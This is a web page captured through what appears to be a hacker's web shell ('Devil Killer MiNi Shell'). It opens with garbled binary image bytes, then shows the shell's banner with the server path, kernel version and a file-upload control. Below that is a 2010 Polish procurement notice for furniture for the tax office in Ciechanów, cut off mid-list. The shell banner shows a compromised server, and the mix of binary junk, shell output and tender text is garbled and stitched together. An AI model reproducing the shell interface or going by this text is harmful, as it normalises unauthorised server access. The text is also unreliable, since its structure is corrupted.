JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101118/328867-N-2010.html

<p class="kh_header"><b>Ciechanów: Dostawa i montaż mebli do sekretariatu, pomieszczenia socjalnego oraz stołów konferencyjnych dla Urzędu Skarbowego w Ciechanowie</b><br>
<b>Numer ogłoszenia: 328867 - 2010; data zamieszczenia: 18.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w  Ciechanowie , ul. Warszawska 58, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723538, 6724439 w. 221, faks 023 6723538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.is.waw.pl/usciechanow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli do sekretariatu, pomieszczenia socjalnego oraz stołów konferencyjnych dla Urzędu Skarbowego w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa i montaż  mebli do sekretariatu, pomieszczenia socjalnego oraz stołów konferencyjnych dla Urzędu Skarbowego w Ciechanowie.

I.	Meble - sekretariat

1.	Biurko (rysunek nr 1) - 1 sztuka  - wymiary: długość 160 cm, szerokość 80 cm, wysokość 74 cm; wykonane z płyty laminowanej typu Kronopol lub równoważna o grubości przekroju blatu i boków biurka 46 mm w kolorze orzech (do uzgodnienia z Zamawiającym), krawędzie oklejone listwą PCV o grubości minimum 2 mm  kolor identyczny z kolorem płyty podstawowej. Pod blatem zamontowana półka pod klawiaturę na prowadnicach metalowych w kolorze zbliżonym do koloru płyty. Na froncie biurka blenda z płyty laminowanej o grubości 18 mm w kolorze identycznym jak płyta podstawowa, mocowana na dystansach metalowych w kolorze zastosowanych uchwytów meblowych do uzgodnienia z Zamawiającym (po 2 sztuki mocowanie do boków oraz 3 sztuki mocowanie do blatu)
Blenda cofnięta w stosunku do frontu o  10 - 15 cm. W blacie montowana 1 szt. przepustnica kablowa O80 w kolorze zbliżonym do koloru biurka - montaż na miejscu u Zamawiającego,
Biurko na ślizgaczach meblowych regulowanych.

2.	Dostawka do biurka (rysunek nr 3): - długość 125 cm, szerokość 40 cm, wysokość skrzyni 55 cm - 1 sztuka
Wykonana z płyty laminowanej typu Kronopol lub równoważna o grubości 18 mm, kolor identyczny jak w poz. 1, krawędzie oklejone listwą PCV o grubości minimum 2 mm  kolor identyczny z kolorem płyty podstawowej. Dostawka zwieńczona wieńcem i cokołem o wysokości 46 mm. Wzdłuż tylnej górnej krawędzi zamontowana listwa odbojowa wysokości 80 mm. Szafka dzielona na trzy części szerokości 2x45 cm + 35 cm. W lewej części szerokości 45 cm zamontowana półka w ? wysokości oraz drzwiczki zamykane na zamek meblowy otwierane na lewą stronę. W prawej części szerokości 45 cm dwie szuflady na prowadnicach zamykane na zamek centralny. W części środkowej szerokości 30 cm miejsce na komputer. Tył szafki wykonany z płyty pilśniowej lakierowanej w kolorze zbliżonym do płyty podstawowej, z wyciętym otworem na przewody i wentylację komputera. Dostawka stojąca na ślizgaczach meblowych regulowanych, wyposażona w metalowe uchwyty meblowe - do uzgodnienia z zamawiającym.

3.	Komoda  scalona z dwóch elementów (rysunek nr 2) - 1 komplet
a)	szafka o wymiarach: długość 90 cm, szerokość 40 cm, wysokość 143 - 145 cm.
 Front szafki wykończony listwą cokołową i wieńczącą licującymi z płaszczyzną drzwi wysokości 46 mm każda.
Szafka podzielona wewnątrz przegrodą pionową na dwie równe części zamykane skrzydłem drzwiowym o wysokości szafy pomniejszonej o wysokość listwy cokołowej i wieńczącej. Skrzydła drzwiowe otwierane na lewą stronę. Przestrzeń wewnętrzna podzielona trzema półkami równo rozstawionymi na wysokości szafy.
Drzwi zamykane na zamki meblowe. Szafka wykonana z płyty laminowanej typu Kronopol lub równoważna o grubości 18 mm, kolor identyczny jak w poz. 1, krawędzie oklejone listwą PCV o grubości minimum 2 mm  kolor identyczny z kolorem płyty podstawowej, tył szafki wykonany z płyty pilśniowej lakierowanej w kolorze zbliżonym do płyty podstawowej, stojąca na ślizgaczach meblowych regulowanych, wyposażona w metalowe uchwyty meblowe - do uzgodnienia z zamawiającym.

b)	dostawka do szafki o wymiarach długość 45 cm, szerokość 80 cm, wysokość 74 cm 
 wykonana z płyty laminowanej typu Kronopol lub równoważna o grubości przekroju blatu i boków dostawki 46 mm w kolorze orzech (do uzgodnienia z Zamawiającym), krawędzie oklejone listwą PCV o grubości minimum 2 mm  kolor identyczny z kolorem płyty podstawowej. Pod blatem zamontowana półka. Na froncie dostawki (od strony szafki wymienionej w pkt a) blenda z płyty laminowanej o grubości 18 mm w kolorze identycznym jak płyta podstawowa, mocowana na dystansach metalowych w kolorze zastosowanych uchwytów meblowych do uzgodnienia z Zamawiającym. Blenda cofnięta w stosunku do frontu 10 - 15 cm (stylizacja analogicznie jak biurko poz. 1). Bok dostawki od strony ściany cofnięty w stosunku do krawędzi blatu o 10-15 cm. Od strony ściany, mocowana do elementu 3a i 3b, blenda z pleksi w kolorze biały mleczny o wymiarach netto  45 cm x 69 cm (143cm -74 cm).

4.	Stolik okolicznościowy (rysunek nr 4)  - 1 sztuka o wymiarach długość 40 cm, szerokość 30 cm, wysokość 65 - 70 cm. Wykonany z płyty laminowanej typu Kronopol lub równoważna o grubości przekroju blatu i boków dostawki 46 mm w kolorze orzech (do uzgodnienia z Zamawiającym), krawędzie oklejone listwą PCV o grubości minimum 2 mm  kolor identyczny z kolorem płyty podstawowej.

5.	Szafa wolnostojąca ubraniowa  - 1 sztuka o wymiarach:  długość 130 cm, szerokość 70 cm, wysokość 210 cm. Szafa dwuskrzydłowa z drzwiami przesuwnymi, układ jezdny typu Komandor, Senator lub równoważny. Lewe skrzydło wykończone lustrem. Skrzydła wykończone listwami pionowymi (rączkami) metalowymi w kolorze uchwytów meblowych zastosowanych w poz. od 1 - 3 do uzgodnienia z zamawiającym. Front szafy wykończony listwą cokołową i wieńczącą o szerokości 46 mm. Wewnątrz szafy mocowana rura metalowa na wieszaki ubraniowe (na całą długość szafy). Powyżej rury zamontowana półka. Wewnątrz szafy w lewym rogu zamontowany ociekacz na parasole. Wykonana z płyty laminowanej typu Kronopol lub równoważna o grubości 18 mm, kolor identyczny jak w poz. 1, krawędzie oklejone listwą PCV o grubości minimum 2 mm  kolor identyczny z kolorem płyty podstawowej, tył szafki wykonany z płyty pilśniowej lakierowanej w kolorze zbliżonym do płyty podstawowej, stojąca na ślizgaczach meblowych regulowanych - do uzgodnienia z zamawiającym.



6.	Komoda  - 1 sztuka o wymiarach: długość 160 cm, szerokość 60 cm, wysokość 75 cm. Wszystkie elementy wykonane z płyty laminat 18 mm np. Kronopol w kolorze klon Vancouver lub równoważna, oklejone listwą PCV 2 mm w kolorze zbliżonym do koloru płyty podstawowej. Zbudowana z dwóch części - pierwsza część szerokości 45 - 50 cm z lewej strony zbudowana z czterech szuflad na prowadnicach, zamykanych na zamek centralny, druga część szafka dwudrzwiowa z przegrodą pionową zamykana na zamek meblowy. Wewnątrz szafki półka w połowie wysokości. Komoda wyposażona w uchwyty metalowe do uzgodnienia z zamawiającym, stojąca na ślizgaczach meblowych regulowanych. 

7.	Listwy odbojowe - 2 sztuki
szerokość 30 cm, długość 320 cm - 1 szt. , długość 315 cm- 1 szt., wykonane z płyty laminowanej o grubości 18 mm Kronopol lub równoważna, w kolorze klon Vancouver  oklejone PCV o grubości 2 mm w kolorze zbliżonym do płyty podstawowej. Mocowane do ściany u zamawiającego na dystansach metalowych o wysięgu ok. 5 cm.

II.  Meble - pomieszczenie socjalne - 1 komplet

 Szafki dolne - pomieszczenie socjalne
1)	Zabudowa 1 - pomieszczenie socjalne - prawa strona
a)	szafka stojąca - zabudowa zmywarki dostosowana do montażu zmywarki o szerokości 45 cm z panelem sterowniczym ukrytym w górnej krawędzi drzwi uchylnych, 
b)	szafka zlewozmywakowa stojąca o długości 85-90 cm, dwuskrzydłowa, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.
c)	szafka stojąca uzupełniająca o długości 35 cm, skrzydło prawe, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym, szerokosć szafki zmniejszona o ok. 17 cm (obmiar rzeczywisty). Zamontowana jedna półka w połowie wysokości wykonana z płyty laminowanej o grubości min. 22 mm oklejonej PCV 2 mm. 

2)	Zabudowa lewej strony w kształcie litery L
a)	szafka stojąca o długości 80 cm, dwuskrzydłowa, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym, zamontowana jedna półka w połowie wysokości wykonana z płyty laminowanej o grubości 22 mm oklejonej PCV 2 mm.
b)	szafka stojąca narożna w kształcie litery L o wymiarach 100 cm x 105 cm, zamykana dwoma skrzydłami (40 cm - lewe, 45 cm prawe), pomiędzy skrzydłami słupek konstrukcyjny. Zamontowane zawiasy puszkowe umożliwiające otwarcie drzwi do kąta rozwartego. Zamontowana półka (w kształcie litery L) w połowie wysokości wykonana z płyty laminowanej min. 22 mm.
c)	szafka stojąca o długości 40 cm z szufladami (4 szt. równej wysokości) z zamontowanymi prowadnicami metalowymi, uchwytami metalowymi do uzgodnienia z zamawiającym.
d)	szafka stojąca o długości 45 cm, skrzydło prawe, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym, zamontowana jedna półka w połowie wysokości wykonana z płyty laminowanej o grubości 22 mm. 
Szafki wymienione w poz.2) z zamontowanymi zamkami meblowymi.

Szafki wykonane z płyty laminowanej 18 mm typu Kronopol lub równoważna o grubości 18 mm, kolor klon Vancouver lub zbliżony - do uzgodnienia z zamawiającym, krawędzie oklejone listwą PCV o grubości minimum 2 mm.  
Szafki wymienione w poz. 1)  a,b,c przykryte blatem kuchennym o łącznej długości około 170 cm dociętym pod wymiar pomieszczenia z wycięciem na montaż zlewozmywaka. Szafki wymienione w poz. 2)  a,b,c,d przykryte blatem w kształcie litery L o wymiarach około 180 cm x 190 cm.
Blat roboczy o szerokości 60 cm wykonany z płyty  wiórowej  o grubości 38 mm oklejonej laminatem HPL o dużej wytrzymałości na temperaturę i ścieralność typu Kronopol lub równoważny, z zaokrąglonym rantem od frontu, krawędzie boczne wykończone listwą PCV o grubości min. 2 mm. Blat wykończony listwą przyścienną kątową z PCV o wymiarach max. 25x25 mm. Kolor blatów i listew wykończeniowych do uzgodnienia z zamawiającym. Wysokość szafek łącznie z blatem 86 - 88 cm, szerokość szafek dostosowana do blatu o szerokości 60 cm. Szafki stojące na nóżkach  regulowanych, wykończone listwą cokołową o wysokości do 10 cm. Przy posadzce wykończenie listwą PCV bezbarwną - przezroczystą zabezpieczającą przed zabrudzeniem.  
Wymiary poszczególnych elementów winny być potwierdzone poprzez rzeczywisty obmiar pomieszczenia dokonany przez Wykonawcę.

Szafki górne - pomieszczenie socjalne - lewa strona
a)	szafka wisząca długości 60 cm, wysokości 45 cm, skrzydło lewe, zamykana na zamek  meblowy,  zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.
c)	szafka wisząca długości 80 cm, wysokości 72 cm, dwuskrzydłowa z zamontowaną półką w połowie wysokości, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.
d)	szafka wisząca długości 40 cm, wysokości 72 cm, skrzydło prawe, zamontowana jedna półka w połowie wysokości,  zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.
e)	szafka wisząca długości 60 cm, wysokości 72 cm, skrzydło prawe zamykana na zamek meblowy,  zamontowana półka w połowie wysokości, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.

Szafki górne - pomieszczenie socjalne - prawa strona.
a)	szafka wisząca długości 45 cm, wysokości  72 cm, skrzydło lewe, zamontowana półka w połowie wysokości, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.
b)	szafka wisząca długości 85 ÷ 90 cm, wysokości 72 cm, otwarta od dołu, dwuskrzydłowa z zamontowanym  ociekaczem dwupoziomowym do naczyń,  zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.
c)	szafka wisząca długości 35 cm, wysokości 72 cm, szerokość zmniejszona o ok. 17 cm,  skrzydło prawe z zamontowaną półką w połowie wysokości, zawiasy puszkowe, uchwyty metalowe do uzgodnienia z zamawiającym.

Szafki wykonane z płyty laminowanej 18 mm typu Kronopol lub równoważna o grubości 18 mm, kolor klon Vancouver lub zbliżony - do uzgodnienia z zamawiającym, krawędzie oklejone listwą PCV o grubości minimum 2 mm.  
Szerokość szafek  30 cm . Szafki wiszące montowane na listwach  metalowych co umożliwia regulację ustawienia szafek.
Pod szafkami zamontowane oświetlenie punktowe w ilości 5 szt. - rodzaj lampek do uzgodnienia z zamawiającym.

III   Stoły 

1.	Stół konferencyjny  - 8 sztuk
Wymiary stołu: szerokość blatu 90 cm, rozstaw nóg 200 - 210 cm 
Blat stołu wykonany z płyty laminat o grubości  minimum 25 mm oklejony PCV 2 mm, kolor: np. klon vancouver z katalogu Kronopol lub równoważny  - do uzgodnienia z zamawiającym. Blat osadzony na stabilnej ramie metalowej w kolorze złotym na czterech nogach o przekroju O6 z rury metalowej okrągłej w kolorze złotym takim jak kolor ramy - do uzgodnienia z zamawiającym. Stelaż metalowy cofnięty w stosunku do krawędzi blatu 5 - 10 cm - do uzgodnienia z zamawiającym. Wszystkie stoły o jednakowych wymiarach. 

2.	Stół konferencyjny - 1 sztuka
Wymiary stołu: szerokość blatu 90 cm, rozstaw nóg 300 - 310 cm
Blat stołu wykonany z płyty laminat o grubości minimum 25 mm oklejony PCV 2 mm, kolor: np. klon vancouver z katalogu Kronopol lub równoważny  - do uzgodnienia z zamawiającym. Blat osadzony na stabilnej ramie metalowej w kolorze złotym na czterech nogach o przekroju O6 z rury metalowej okrągłej w kolorze złotym takim jak kolor ramy - do uzgodnienia z zamawiającym.
Stelaż metalowy cofnięty w stosunku do krawędzi blatu 5 - 10 cm - do uzgodnienia z zamawiającym.

3.	Ława gabinetowa -  1 sztuka
Wymiary:  długość140 cm, szerokość 70cm, wysokość 65cm. Ława na czterech nogach wykonana z płyty  MDF fornirowanej. Nogi ławy o przekroju 8cm/8cm. Blat grubości  min. 3cm z listwą wieńcząca pod blatem 8cm. Półka na gazety poniżej blatu.  Kolorystyka                   i stylizacja nawiązująca do występujących mebli gabinetowych u zamawiającego.

4.	 Stolik gabinetowy -  1 sztuka
Wymiary:  długość 80 cm, szerokość 80cm, wysokość 77cm.  Stolik na czterech nogach wykonany z płyty  MDF fornirowanej. Nogi stolika o przekroju 8cm/8cm. Blat grubości  min. 3cm z listwą wieńcząca pod blatem 8cm. Półka na gazety poniżej blatu.  Kolorystyka                       i stylizacja nawiązująca  do występujących mebli gabinetowych u zamawiającego.


1.	Zaoferowane przez Wykonawcę meble muszą być fabrycznie nowe, pełnowartościowe                    i w pierwszym gatunku, a także spełniać parametry techniczne i jakościowe wymagane przez Zamawiającego.
2.	Materiały użyte do wykonania mebli winny posiadać odpowiednie, określone przepisami i normami atesty bezpieczeństwa i higieny pracy, co powinno być poświadczone odpowiednimi atestami lub oświadczeniem Wykonawcy że materiały użyte do wykonania mebli spełniają wymagania bezpieczeństwa i higieny pracy.
3.	Użyty materiał nie może zmieniać struktury i koloru pod wpływem ciepła i wody.
4.	Wykonawca zobowiązany jest dostarczyć meble, dokonać ich montażu przy użyciu  narzędzi należących do Wykonawcy oraz ustawić je w miejscach wskazanych przez Zamawiającego.
5.	Zamawiający zastrzega sobie prawo zwrócenia się do Wykonawcy, w toku badania ofert,                         o zaprezentowanie oferowanych mebli w miejscu uzgodnionym przez Wykonawcę                           z Zamawiającym.
6.	Oferowane meble muszą być objęte co najmniej 24 miesięczną gwarancją jakości, okres gwarancji liczony jest od daty podpisania protokołu odbioru towaru, dotyczącego całości przedmiotu umowy.

Miejsce dostawy: Urząd Skarbowy w Ciechanowie, ul. Warszawska 58, 06 - 400 Ciechanów. 

Wykonawcy mogą dokonać wizji lokalnej pomieszczeń do których przewidziana jest dostawa i montaż mebli objętych przedmiotem zmówienia, oraz dokonać własnych pomiarów szczególnie w zakresie wykonania zabudowy pomieszczenia socjalnego.
Wizji lokalnej można dokonać codziennie od poniedziałku do piątku w godz. 8:00 do 15;00, po uprzednim telefonicznym uzgodnieniu terminu.

Wymienione w jakiejkolwiek części opisu przedmiotu zamówienia nazwy, marki wyrobów, nie są obligatoryjne dla Wykonawców. Wykonawca ma prawo do zaoferowania innych wyrobów pod warunkiem zapewnienia parametrów technicznych, co najmniej identycznych z parametrami wyrobów wymienionymi w SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.14.14.00-6, 39.12.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu  Zamawiający nie  wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy posiadają doświadczenie zawodowe, tzn. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej dwie dostawy mebli o wartości nie  niższej  niż  15.000 zł brutto każda dostawa.Ocena spełniania ww warunków  udziału w postępowaniu  zostanie dokonana wg formuły:  spełnia - nie spełnia. Z treści złożonych dokumentów  wymaganych w części VI  i VII SIWZ musi wynikać jednoznacznie,  iż przedstawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

